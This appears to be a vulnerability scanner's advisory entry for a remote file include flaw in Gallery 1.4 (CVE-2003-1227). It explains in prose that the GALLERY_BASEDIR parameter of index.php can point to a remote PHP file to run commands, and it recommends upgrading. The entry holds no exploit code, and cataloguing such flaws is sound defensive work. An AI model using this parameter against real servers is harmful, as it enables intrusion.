| VID |
21278 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The Gallery software has a remote file include vulnerability(2) in the index.php script file.
Bharat Mediratta Gallery is a Web-based software product that lets you manage photos on any Web site that offers PHP support. Gallery version 1.4 and later could allow a remote attacker to include malicious PHP files, caused by a vulnerability in the index.php script. A remote attacker could send a specially-crafted URL request to the index.php script using the '?GALLERY_BASEDIR' variable that specifies a malicious PHP file from a remote system as a parameter, which would allow the attacker to execute arbitrary commands on the vulnerable Web server with the privileges of the Web server.
* References:
http://archives.neohapsis.com/archives/bugtraq/2003-10/0140.html
http://www.securiteam.com/unixfocus/6S00H0U8KG.html
* Platforms Affected:
Bharat Mediratta Gallery 1.4
Linux Any version |
| Recommendation |
Upgrade to the latest version of Gallery (1.4pl2 or 1.4.1 or later), available from the SourceForge Web site, Project: Gallery at http://sourceforge.net/projects/gallery |
| Related URL |
CVE-2003-1227 (CVE) |
| Related URL |
8814 (SecurityFocus) |
| Related URL |
13419 (ISS) |
|
